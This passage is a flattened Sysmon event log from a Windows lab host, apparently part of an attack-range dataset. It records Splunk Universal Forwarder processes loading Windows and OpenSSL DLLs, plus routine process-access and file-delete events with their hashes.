CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100672Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x8000000000000000100671Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100670Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100669Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000100668Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100667Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9trueSplunk, Inc.Valid 10341000x8000000000000000100666Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100665Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100664Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100663Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100662Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-A252-6294-0500-000000005502}416532C:\Windows\system32\csrss.exe{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100661Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100660Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:49.031{326FD73D-C169-6294-4A0B-000000005502}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000100765Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:50.234{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0998A254D62E60405AAC78ECB3AADD56,SHA256=9891980434966A00624E64E6D855464B3920CB602851DFCD45A22EE00825EB29,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100764Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:50.124{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1D1D6A82E32FC6F9A67E87C8041C758F,SHA256=3E4B91C0B6087356471426DFA7EC178DE12232A2A80BC644268D617ED3CDDFF5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100853Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.5125 (rs1_release.220429-1732)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=B2906606F5996AC73714F1910DB63626,SHA256=6BC9B694C275405A54CA8116C4D2BAD2ECA39B28B34B04358818059D743A572F,IMPHASH=396555AAEAB1402915E17EE8C257B7CFtrueMicrosoft WindowsValid 734700x8000000000000000100852Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100851Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x8000000000000000100850Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x8000000000000000100849Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000100848Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100847Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100846Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100845Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100844Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100843Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100842Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100841Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100840Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000100839Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100838Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100837Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100836Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x8000000000000000100835Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100834Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100833Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100832Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 10341000x8000000000000000100831Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100830Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100829Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000100828Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer 